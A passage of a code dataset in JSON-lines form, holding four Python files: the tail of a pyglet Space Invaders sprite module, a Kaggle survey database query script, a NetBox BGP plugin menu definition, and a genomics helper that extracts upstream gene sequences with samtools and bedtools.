len(self.states):\n row = len(self.states)\n for i_r in xrange(row):\n for i_c in self.CC:\n s = self.states[i_r][i_c]\n if s:\n anythingMelted = True\n self.states[i_r][i_c] = self._reducedState(s, True)\n return anythingMelted\n \nclass Shields(object):\n def __init__(self, window):\n sw = _Shield(0, 0).width\n pad = 128\n num = 4\n y = 96\n i_pad = (window.width - 2 * pad - sw) / (num-1)\n self.subs = [_Shield(pad + i_pad*i_x, y)\n for i_x in range(4)]\n self.top = self.subs[0].top()\n self.nextMelt = self.top\n def melt(self, invaderheight):\n anythingMelted = False\n if invaderheight < self.nextMelt:\n for s in self.subs:\n if s.melt(self.top - invaderheight):\n anythingMelted = True\n if not anythingMelted:\n self.nextMelt -= self.subs[0].bitHeight()\n return anythingMelted\n def absorbFromAbove(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, True)\n def absorbFromBelow(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, False)\n def _absorb(self, xl, yl, xh, yh, fromAbove):\n for s in self.subs:\n if s.absorb(xl, yl, xh, yh, fromAbove):\n return self\n return None\n def update(self):\n pass\n def paint(self):\n for s in self.subs:\n s.paint()\n\nclass Lives(object):\n PAD_OUTER = 3\n PAD_INNER = 1\n def __init__(self, window):\n self.liferepr = pyglet.resource.image('playerlife.png')\n self.count = 2\n self.x = window.width - (self.PAD_OUTER + self.liferepr.width)\n self.y = window.height - (self.PAD_OUTER + self.liferepr.height)\n def paint(self):\n for i in range(self.count):\n x = self.x - i * (self.PAD_INNER + self.liferepr.width)\n self.liferepr.blit(x, self.y)\n def update(self):\n pass\n def upOne(self):\n self.count += 1\n def loseOne(self):\n self.count -= 1\n\nclass Player(object):\n def __init__(self, window, keys):\n self.w = window\n self.k = keys\n self.gun = _Gun(window)\n self.s_alive = _AlivePlayer(window, keys, self.gun)\n self.s_dead = _DeadPlayer()\n self.state = self.s_alive\n def isHit(self, xl, yl, xh, yh):\n if self.state != self.s_alive: return None\n if self.s_alive.isHit(xl, yl, xh, yh):\n self.s_dead.init(self.s_alive.x, self.s_alive.y)\n self.state = self.s_dead\n return self\n return None\n def testGunHit(self, hitFuns):\n self.gun.testHit(hitFuns)\n def update(self):\n self.gun.update()\n if self.state == self.s_dead:\n if not self.state.stillDead:\n self.state = self.s_alive\n self.state.resurrect()\n self.state.update()\n def paint(self):\n self.gun.paint()\n self.state.paint()\n\nclass LostPlayer(object):\n def __init__(self, origPlayer):\n if origPlayer.state == origPlayer.s_alive:\n self.state = origPlayer.s_dead\n self.state.init(origPlayer.s_alive.x,\n origPlayer.s_alive.y)\n else:\n self.state = origPlayer.s_dead\n def isHit(self, xl, yl, xh, yh):\n return None\n def testGunHit(self, hitFuns):\n pass\n def update(self):\n self.state.update()\n def paint(self):\n self.state.paint()\n\nclass _DeadPlayer(object):\n ANIMSPEED = 3\n def __init__(self):\n self.anim = [\n pyglet.resource.image('playermelt01.png'),\n pyglet.resource.image('playermelt02.png'),\n pyglet.resource.image('playermelt03.png'),\n pyglet.resource.image('playermelt04.png'),\n ]\n self.a_tick = 0\n self.a_state = None\n self.stillDead = None\n self.x, self.y = 0, 0\n def init(self, x, y):\n self.x = x\n self.y = y\n self.a_state = 0\n self.stillDead = 30\n self.a_tick = self.ANIMSPEED\n def update(self):\n if self.stillDead: self.stillDead -= 1\n if self.a_state == None: return\n self.a_tick -= 1\n if self.a_tick: return\n self.a_tick = self.ANIMSPEED\n self.a_state += 1\n if self.a_state >= len(self.anim):\n self.a_state = None\n return\n def paint(self):\n if self.a_state == None: return\n self.anim[self.a_state].blit(self.x, self.y)\n \nclass _AlivePlayer(object):\n def __init__(self, window, keys, gun):\n self.w = window\n self.gun = gun\n self.s = pyglet.resource.image('player.png')\n self.x, self.y = self.w.width/2, 4\n self.keys = keys\n self.invulnerable = 0\n def resurrect(self):\n self.invulnerable = 50\n def update(self):\n if self.invulnerable:\n self.invulnerable -= 1\n vx = 0\n if self.keys[key.LEFT]: vx -= 10\n if self.keys[key.RIGHT]: vx += 10\n self.x += vx\n self.x = max(self.x, 0)\n self.x = min(self.x, self.w.width - self.s.width)\n if self.keys[key.SPACE]: self._pewpew()\n def isHit(self, xl, yl, xh, yh):\n if self.invulnerable: return False\n sxh = self.x+self.s.width\n syh = self.y+self.s.height\n if yl > syh: return False\n if yh < self.y: return False\n if xl > sxh: return False\n if xh < self.x: return False\n return True\n def paint(self):\n if self.invulnerable:\n if (self.invulnerable/5)%2:\n return\n self.s.blit(self.x, self.y)\n def _pewpew(self):\n self.gun.fire(self.x + (self.s.width/2), self.y + self.s.height)\n\nclass _Gun(object):\n COOLDOWN_MAX = 5\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('pewpew.png')\n self.cx, self.cy = self.s.width/2, 0\n self.x, self.y = 0, 0\n self.firing = False\n self.cooldown = 0\n def fire(self, x, y):\n if self.firing: return\n if self.cooldown: return\n self.x = x - self.cx\n self.y = y - self.cy\n self.firing = True\n self.cooldown = self.COOLDOWN_MAX\n def update(self):\n if self.cooldown: self.cooldown -= 1\n if not self.firing: return\n self.y += 15\n if self.y > self.w.height:\n self.firing = False\n return\n def testHit(self, hitFun):\n if not self.firing: return\n if hitFun(self.x, self.y, self.x+self.s.width, self.y+self.s.height):\n self.firing = False\n def paint(self):\n if not self.firing: return\n self.s.blit(self.x, self.y)\n\nclass _InvaderExplode(object):\n def __init__(self):\n s = [pyglet.resource.image('invaderexplode0.png'),\n pyglet.resource.image('invaderexplode1.png')]\n self.x, self.y = 0, 0\n self.sm = {'inactive': {'d': 0, 'next': None, 's': None},\n 'explode0': {'d': 5, 'next': 'explode1', 's': s[0]},\n 'explode1': {'d': 10, 'next': 'inactive', 's': s[1]}}\n self.st = 'inactive'\n self.st_c = 0\n def trans(self, state):\n self.st = state\n self.st_c = self.sm[state]['d']\n def boom(self, x, y):\n self.x, self.y = x, y\n self.trans('explode0')\n def paint(self):\n s = self.sm[self.st]['s']\n if not s: return\n s.blit(self.x, self.y)\n def update(self):\n if not self.st_c: return\n self.st_c -= 1\n if self.st_c: return\n self.trans(self.sm[self.st]['next'])\n\nclass _InvaderZap(object):\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('zapzap.png')\n self.cx, self.cy = self.s.width/2, 0\n self.xyl = []\n self.wh = (self.s.width, self.s.height)\n def fire(self, x, y):\n self.xyl.append([x - self.cx, y - self.cy])\n def update(self):\n for p in self.xyl: p[1] -= 10\n self.xyl = [p for p in self.xyl if p[1] > -self.s.height]\n def testHit(self, hitFuns):\n hitItems = []\n xyl2 = []\n for p in self.xyl:\n bounds = p[0], p[1], p[0]+self.s.width, p[1]+self.s.height\n hit = reduce(lambda a, f: a or f(*bounds), hitFuns, None)\n if hit:\n hitItems.append(hit)\n continue # shot absorbed\n xyl2.append(p)\n self.xyl = xyl2\n return hitItems\n def paint(self):\n for [x, y] in self.xyl:\n self.s.blit(x, y)\n\nclass Invaders(object):\n def __init__(self, window, diffLevel):\n self.w = window\n self.diffLevel = diffLevel\n self.ROWS = 6\n self.COLS = 8\n self.explode = _InvaderExplode()\n self.zap = _InvaderZap(window)\n self.invader0 = [\n pyglet.resource.image('invader01.png'),\n pyglet.resource.image('invader02.png')]\n self.iw, self.ih = self.invader0[0].width, self.invader0[0].height\n self.pad = 16\n self.x = 2 * self.pad\n self.y = self.w.height - (self.ih + 2 * self.pad)\n self.il = [[True]*self.COLS for _ in [None]*self.ROWS]\n self.bipbop = 0\n self.bipcnt = 0\n self.zapcnt = 100\n self.vx = self.iw/4\n self.vy = -(self.ih + self.pad)\n self.calcWidth()\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.moving = True\n\n def reachedBottom(self):\n return self.bottomBoundary <= 0\n\n def calcBottomBoundary(self):\n bott = -1\n for i_r in xrange(len(self.il)):\n if max(self.il[i_r]):\n bott = i_r\n _, y = self.pos(bott, 0)\n return y\n \n def calcSpeed(self):\n def getDiffCurve():\n if self.diffLevel > 12:\n return [1, 2, 3, 4, 5, 6, 7]\n if self.diffLevel > 8:\n return [1, 2, 4, 5, 6, 8, 10]\n if self.diffLevel > 6:\n return [2, 4, 5, 6, 8, 10, 13]\n if self.diffLevel > 4:\n return [3, 5, 6, 8, 10, 13, 16]\n if self.diffLevel > 1:\n return [4, 6, 8, 10, 13, 16, 18]\n else:\n return [5, 7, 10, 13, 16, 18, 20]\n speeds = getDiffCurve()\n n = 0\n for r in xrange(self.ROWS):\n for c in xrange(self.COLS):\n if self.il[r][c]:\n n += 1\n if n < 2:\n return speeds[0]\n if n < 5:\n return speeds[1]\n if n < 10:\n return speeds[2]\n if n < 20:\n return speeds[3]\n if n < 30:\n return speeds[4]\n if n < 40:\n return speeds[5]\n else:\n return speeds[6]\n\n def collide(self, xl, yl, xh, yh):\n for i_r in xrange(self.ROWS):\n i_yl = self.y - (self.ih + self.pad) * i_r\n i_yh = i_yl + self.ih\n if yh < i_yl: continue\n if yl > i_yh: continue\n for i_c in xrange(self.COLS):\n i_xl = self. x + (self.iw + self.pad) * i_c\n i_xh = i_xl + self.iw\n if xh < i_xl: continue\n if xl > i_xh: continue\n if self.il[i_r][i_c]:\n self.il[i_r][i_c] = False\n self.explode.boom(i_xl, i_yl)\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.reduceSizeIfNeeded()\n return True\n return False\n\n def allDead(self):\n return not self.COLS\n\n def removeZaps(self):\n self.zap = _InvaderZap(self.w)\n\n def reduceSizeIfNeeded(self):\n for i_c in [0, -1]:\n if not self.COLS: return\n if not sum([self.il[i_r][i_c]\n for i_r in range(self.ROWS)]):\n self.stripCol(i_c)\n self.reduceSizeIfNeeded()\n\n def stripCol(self, i_c):\n self.COLS -= 1\n for r in self.il:\n r.pop(i_c)\n if i_c == 0:\n self.x += self.iw + self.pad\n self.calcWidth()\n\n def calcWidth(self):\n self.totWidth = len(self.il[0]) * (self.iw + self.pad) - self.pad\n\n def getBottomOfRandomRow(self):\n candidates = []\n for i_c in xrange(self.COLS):\n for i_r in xrange(self.ROWS-1, -1, -1):\n if self.il[i_r][i_c]:\n candidates.append((i_r, i_c))\n break\n if not candidates:\n return None, None\n r, c = random.choice(candidates)\n x, y = self.pos(r, c)\n x += self.invader0[0].width / 2\n return x, y\n\n def update(self):\n self.explode.update()\n self.zap.update()\n self.bipcnt = (self.bipcnt + 1)%self.speed\n if self.bipcnt == 0:\n self.bipbop = (self.bipbop + 1)%2\n if self.moving:\n self.x += self.vx\n if (self.x + self.totWidth > self.w.width) or (self.x < 0):\n self.vx *= -1\n self.x += self.vx\n self.y += self.vy\n self.bottomBoundary = self.calcBottomBoundary()\n self.zapcnt -= 1\n if self.zapcnt == 0:\n self.zapcnt = random.randrange(10, 120)\n x, y = self.getBottomOfRandomRow()\n if x != None:\n self.zap.fire(x, y)\n\n def pos(self, r, c):\n return (self.x + c*(self.iw + self.pad),\n self.y - r*(self.ih + self.pad))\n\n def paint(self):\n def paintOne(row, col):\n x, y = self.pos(row, col)\n s = self.invader0[self.bipbop]\n s.blit(x, y)\n self.explode.paint()\n self.zap.paint()\n for ir in xrange(len(self.il)):\n row = self.il[ir]\n for ic in xrange(len(row)):\n row[ic] and paintOne(ir, ic)\n\nGAMEOVER_LABEL = pyglet.text.Label(\n 'GAME OVER',\n font_name=\"sans\",\n font_size=24,\n x=0, # set later\n y=0, # set later\n anchor_x=\"center\",\n anchor_y=\"center\") \nclass GameOver(object):\n def __init__(self, window):\n self.lbl = GAMEOVER_LABEL\n self.lbl.x = window.width//2\n self.lbl.y = window.height//2\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\nclass Level(object):\n def __init__(self, window):\n self.window = window\n self.value = 1\n self.lbl = self.mkLbl()\n self.fullYayWait = 60\n self.done = False\n def mkLbl(self):\n color = (255, 255, 255, 255)\n shinies = '%s'\n if self.value >= 2:\n shinies = shinies%'-%s-'\n if self.value >= 4:\n shinies = shinies%'=%s='\n if self.value >= 6:\n shinies = shinies%'<%s>'\n if self.value >= 8:\n shinies = shinies%'*%s*'\n if self.value >= 10:\n shinies = shinies%'>%s<'\n if self.value >= 12:\n shinies = shinies%'{%s}'\n if self.value >= 14:\n shinies = shinies%'~%s~'\n if self.value >= 16:\n shinies = shinies%'_%s_'\n if self.value >= 18:\n shinies = shinies%'/%s\\\\'\n if self.value >= 20:\n shinies = shinies%' %s '\n color = (238, 201, 0, 255) # gold!\n return pyglet.text.Label(\n shinies%('LEVEL %d'%self.value),\n font_name=\"sans\",\n font_size=15,\n x=self.window.width // 2,\n y=self.window.height,\n anchor_x=\"center\",\n anchor_y=\"top\",\n color=color)\n def up(self):\n self.value += 1\n self.lbl = self.mkLbl()\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\ndef _mkYayLbl(level):\n return pyglet.text.Label(\n 'YOU BEAT LEVEL %d'%level,\n font_name=\"sans\",\n font_size=50,\n x=0, # window.width // 2 later\n y=0, # window.height // 2 later\n anchor_x=\"center\",\n anchor_y=\"center\")\n_YAY_LABELS = [_mkYayLbl(n) for n in xrange(20)]\nclass YayYou(object):\n def __init__(self, window, level):\n global _YAY_LABELS\n while level >= len(_YAY_LABELS):\n _YAY_LABELS.extend([_mkYayLbl(n) for n in xrange(len(_YAY_LABELS), len(_YAY_LABELS)+10)])\n self.lbl = _YAY_LABELS[level]\n self.lbl.x = window.width // 2\n self.lbl.y = window.height // 2\n self.countdown = 60\n self.halfcountdown = self.countdown // 2\n self.done = False\n self.halfDone = False\n def update(self):\n if self.countdown:\n self.countdown -= 1\n self.halfDone = self.countdown > self.halfcountdown\n self.done = not self.countdown\n def paint(self):\n self.lbl.draw()\n","repo_name":"deestan/invade","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"40295778448","text":"import psycopg2\n# from theapp import app\n# import viz\n# from flask import render_template, request\n#import pandas as pd #We don't have pandas yet.\n#We need to get some input things\n\n\n#y_n = request.args.get('all_or_none', default = None, type = str)\n#qst = request.args.get('question' , default = None, type = str)\n# subset by dropdown\ny_n = 'yes'\nqst = \"Who/what are your favorite media sources that report on data science topics?\"\n\nquestion_to_column = {\"Which of the following relational database products do you use on a regular basis?\": 'q34',\n 'Which of the following cloud computing platforms do you use on a regular basis?' : 'q29',\n \"Which of the following natural language processing (NLP) methods do you use on a regular basis?\": 'q27',\n 'Which categories of computer vision methods do you use on a regular basis?': 'q26',\n 'Which categories of ML tools do you use on a regular basis?' : 'q25' ,\n 'Which of the following ML algorithms do you use on a regular basis?': 'q24',\n 'What programming languages do you use on a regular basis?': 'q18',\n \"Which of the following integrated development environments (IDE's) do you use on a regular basis?\": 'q16',\n \"What is the primary tool that you use at work or school to analyze data?\": 'q14',\n \"On which platforms have you begun or completed data science courses?\" : 'q13',\n \"Who/what are your favorite media sources that report on data science topics?\": 'q12',\n \"Select any activities that make up an important part of your role at work\": 'q9'}\n\nother_questions = ['q9', 'q12', 'q14', 'q15', 'q16', 'q18', 'q24', 'q25', 'q26', 'q27', \"q29\", 'q34']\n\n# q14 is all free response so all or none are equivalent.\n\nquestion_size = {'q34': 12,\n 'q29': 12,\n 'q27': 6,\n 'q26': 7,\n 'q25': 8,\n 'q24': 12,\n 'q18': 12,\n 'q16': 12,\n 'q14': 5,\n 'q13': 12,\n 'q12': 12,\n 'q9': 8 }\n\n# Initialization code to be able to query the database\nconn = psycopg2.connect(\"dbname=kaggle user=abucklin\")\ncur = conn.cursor()\n\ndef query_generator_and_data_grabber(question = qst, yes_or_no = y_n):\n qnum = question_to_column[qst]\n columns = []\n for i in range(1, question_size[qnum]+1):\n string = qnum + \"_\" + str(i)\n columns.append(string)\n\n columns = columns.replace( \"]\" , \"'\").replace(\"[\", '').replace(\"'\", '')\n\n basic = \"SELECT \" + columns + \" FROM mcq \"\n conditions = ''\n query = basic + conditions + \";\"\n cur.execute(query)\n data = cur.fetchall()\n\n if \"y\" in yes_or_no :\n second = \"SELECT \" + str(qnum) + \"FROM other_questions\"\n cur.execute(second + \";\")\n x = cur.fetchall()\n data = data.extend(x)\n return data\n\n\nraw_data = query_generator_and_data_grabber()\n\n#data = pd.DataFrame(raw_data, columns = [in_ss , in_pp]) #Still don't have pandas.\n","repo_name":"mandab749/State_of_Data_Science","sub_path":"Word_Cloud_queries.py","file_name":"Word_Cloud_queries.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70831663130","text":"from django.conf import settings\n\nfrom extras.plugins import PluginMenuButton, PluginMenuItem, PluginMenu\nfrom utilities.choices import ButtonColorChoices\n\n\n_menu_items = (\n PluginMenuItem(\n link='plugins:netbox_bgp:community_list',\n link_text='Communities',\n permissions=['netbox_bgp.view_community'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:community_add',\n title='Communities',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_community'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgpsession_list',\n link_text='Sessions',\n permissions=['netbox_bgp.view_bgpsession'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgpsession_add',\n title='Sessions',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgpsession'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:routingpolicy_list',\n link_text='Routing Policies',\n permissions=['netbox_bgp.view_routingpolicy'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:routingpolicy_add',\n title='Routing Policies',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_routingpolicy'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:prefixlist_list',\n link_text='Prefix Lists',\n permissions=['netbox_bgp.view_prefixlist'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:prefixlist_add',\n title='Prefix Lists',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_prefixlist'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgppeergroup_list',\n link_text='Peer Groups',\n permissions=['netbox_bgp.view_bgppeergroup'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgppeergroup_add',\n title='Peer Groups',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgppeergroup'],\n ),\n ),\n )\n)\n\nplugin_settings = settings.PLUGINS_CONFIG.get('netbox_bgp', {})\n\nif plugin_settings.get('top_level_menu'):\n menu = PluginMenu( \n label=\"BGP\",\n groups=((\"BGP\", _menu_items),),\n icon_class=\"mdi mdi-bootstrap\",\n )\nelse:\n menu_items = _menu_items\n","repo_name":"k01ek/netbox-bgp","sub_path":"netbox_bgp/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"32"}
+{"seq_id":"6268192961","text":"\"\"\" Scripts with helper functions to download and process gene sequences\n using raw DNA sequences and annotation files.\n\"\"\"\nimport os\nfrom Bio import SeqIO\nfrom . import config, utils\n\n\n# Define Global Vars\nANNOT_SUFFIX_DICT = {'Ensembl': 'gff3',\n 'Refseq': 'gff',\n 'Maize': 'gff3',\n 'Maize_addition': 'gff3',\n 'Maize_nam': 'gff3'}\nGENE_SUFFIX_DICT = {'Ensembl': 'fa',\n 'Refseq': 'fna',\n 'Maize': 'fa',\n 'Maize_addition': 'fa',\n 'Maize_nam': 'fa'}\n\n\n# Helper functions for download data from the selected Database\ndef generate_directories(db_name):\n \"\"\" Creates a list of directories to be added\n Params:\n db_name: str, name of the database to be processed\n \"\"\"\n # Create paths to be added\n db_path = config.data_raw / db_name\n dna_path = db_path / 'dna'\n annot_path = db_path / 'annot'\n processed_db_path = config.data_processed / db_name\n\n for path in [db_path, dna_path, annot_path, processed_db_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef faidx(dna_path, dna_name):\n \"\"\" Adapted from Inari noteobok. Used to extract .fai from .fa file\n Params:\n dna_path: str, directory for the .fa/.fna dna file\n dna_name: str, name for dna .fa/.fna file\n \"\"\"\n exe_str = f\"{config.samtools} faidx {os.path.join(dna_path, dna_name)}\"\n utils.execute(exe_str)\n\n\ndef extract_flanking_region(annot_name, annot_path, db_name):\n \"\"\" Adapted from Inari noteobok. Used to extract the flanking region.\n Generates a .gene.gff3/gff file using the .gff3/gff file.\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n \"\"\"\n # Generate input and output file names\n in_path = os.path.join(annot_path, annot_name)\n suffix = ANNOT_SUFFIX_DICT[db_name]\n out_path = in_path.replace(f\".{suffix}\", f\".gene.{suffix}\")\n exe_str = f\"grep -P '\\tgene\\t' {in_path} > {out_path}\" # -P for ubuntu, -p for linux\n utils.execute(exe_str)\n\n\ndef get_1kbup(dna_name, annot_name, dna_path, annot_path, regulatory_len, db_name):\n \"\"\" Adapted from Inari noteobok. Creates the .gene.1kbup.gff3 file\n using the .gene.gff3 generated using extract_flanking_region.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n regulatory_len: int, length of regulatory region to be extracted\n db_name: str, name of the database to be processed\n \"\"\"\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n\n # Create the exe command to get 1kbup\n exe_str = f\"{config.bedtools} flank -i \"\n exe_str += f\"{os.path.join(annot_path, annot_gene)} \"\n exe_str += f\"-g {os.path.join(dna_path, dna_name)}.fai \"\n exe_str += f\"-l {str(regulatory_len)} \"\n exe_str += \"-r 0 \"\n exe_str += \"-s \"\n exe_str += f\"> {os.path.join(annot_path, annot_1kbup)}\"\n utils.execute(exe_str)\n\n\ndef subtract(dna_name, annot_name, annot_path, db_name):\n ''' Adapted from Inari noteobok. Apply Bedtools subtract to subtract genic\n regions of neighbouring genes from the intergenic flanks.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, directory that stores the gff3/gff file\n annot_path: str, directory that stores the gff3/gff file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n\n exe_str = f\"{config.bedtools} subtract -a \" + \\\n os.path.join(annot_path, annot_1kbup)\n exe_str += \" -b \" + os.path.join(annot_path, annot_gene)\n exe_str += \" > \" + os.path.join(annot_path, annot_nov)\n utils.execute(exe_str)\n\n\ndef remove_split_fragments(annot_name, annot_path, db_name):\n ''' Go over the gtf file and if multiple promoter fragments for one gene:\n retain only last one (largest coordinates) in case of positive strand\n retain only first one (smallest coordinates) in case of negative strand\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n db_name: str, name of the database to be processed\n '''\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n\n # Read in all the extracted regions\n with open(os.path.join(annot_path, annot_nov)) as gtf_fh_in:\n fragment_dict = {}\n orientation_dict = {}\n for line in gtf_fh_in:\n line = line.rstrip()\n line_list = line.split('\\t')\n if db_name == 'Ensembl':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Refseq':\n gene_id_temp = line_list[-1].split(';')[1]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Maize':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(':')[1]\n else:\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split('=')[1]\n orientation = line_list[6]\n line_list[2] = gene_id\n orientation_dict[gene_id] = orientation\n if gene_id not in fragment_dict:\n fragment_dict[gene_id] = []\n fragment_dict[gene_id].append(\"\\t\".join(line_list))\n\n # Write out only the retained ones\n with open(os.path.join(annot_path, annot_final), \"w\") as gtf_fh_out:\n for gene_id in fragment_dict:\n if orientation_dict[gene_id] == '+':\n # take fragment with highest coords, which is latest one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][-1]))\n else:\n # orientation == -\n # take fragment with lowest coords, which is first one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][0]))\n\n\ndef extract_sequence(dna_name, annot_name, dna_path, annot_path, save_path, db_name):\n ''' Adapted from Inari noteobok. Uses Bedtools getfasta to extract\n the final sequences, w/ extension \".gene.1kbup.nov.final.fa\".\n Params:\n dna_name: str, name for dna .fa file\n annot_name: str, name of the annotation .gff3 file\n dna_path: str, directory for the .fa dna file\n annot_path: str, directory that stores the gff3 file\n save_path: str, directory for the output .fa file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n suffix_g = GENE_SUFFIX_DICT[db_name]\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n\n exe_str = f\"{config.bedtools} getfasta -fi \" + \\\n os.path.join(dna_path, dna_name)\n exe_str += \" -bed \" + os.path.join(annot_path, annot_final)\n exe_str += \" -s -name+ > \"\n exe_str += os.path.join(save_path, dna_final)\n utils.execute(exe_str)\n\n\ndef generate_sequence_for_species(dna_name, annot_name, dna_url, annot_url,\n dna_path, annot_path, save_path, db_name,\n species_name, regulatory_len=1000):\n \"\"\" The main function that chains the above methods together to extract the\n relevant sequesnces from the initial .fa/fna dna file and .gff3/gff\n annotation file downloaded from the Ensembl database.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_url: str, url to download the .fa/fna file\n annot_url: str, url to download the .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n save_path: str, directory for the output .fa/fna file\n db_name: str, name of the database to be processed\n species_name: str, name of species\n regulatory_len: int, length of regulatory region to be extracted\n \"\"\"\n # Generate directories\n generate_directories(db_name)\n\n # Create species-specific directory\n species_name = species_name.strip().lower()\n dna_path_s = dna_path / species_name\n annot_path_s = annot_path / species_name\n save_path = save_path / species_name\n for path in [dna_path_s, annot_path_s, save_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n # Download the raw fa and gff files\n utils.download(dna_url, dna_path_s, db_name, dna_name)\n utils.download(annot_url, annot_path_s, db_name, annot_name)\n\n # Unzip the gz files\n utils.unzip(dna_path_s, dna_name)\n utils.unzip(annot_path_s, annot_name)\n\n # Run Faidx command\n faidx(dna_path_s, dna_name)\n\n # Only extract the flanking regions for the genes\n extract_flanking_region(annot_name, annot_path_s, db_name)\n\n # Get 1kbup file\n get_1kbup(dna_name, annot_name, dna_path_s, annot_path_s, regulatory_len, db_name)\n\n # Bedtools to subtract genic regions of neighbouring genes\n # from the intergenic flanks\n subtract(dna_name, annot_name, annot_path_s, db_name)\n\n # Remove Split fragments\n remove_split_fragments(annot_name, annot_path_s, db_name)\n\n # Extract the resulting sequence\n extract_sequence(dna_name, annot_name, dna_path_s, annot_path_s, save_path, db_name)\n\n # Remove raw sequence files\n utils.clear_folder(dna_path_s, to_continue='y')\n # utils.clear_folder(annot_path_s, to_continue='y')\n\n\ndef load_processed_fa(processed_db_path, dna_name, db_name, species_name):\n \"\"\" Helper function to load sequences with name dna_name.\n Params:\n processed_db_path: db_path within processed data folder\n dna_name: name of the .fa/fna file to be loaded\n db_name: str, name of the database to be processed\n species_name: str, name of species\n \"\"\"\n suffix_g = GENE_SUFFIX_DICT[db_name]\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n f_path = os.path.join(processed_db_path, species_name, dna_final)\n fasta_sequences = SeqIO.parse(open(f_path), 'fasta')\n return fasta_sequences\n","repo_name":"benlevyx/florabert","sub_path":"module/inari/gene_db_io.py","file_name":"gene_db_io.py","file_ext":"py","file_size_in_byte":11309,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"}
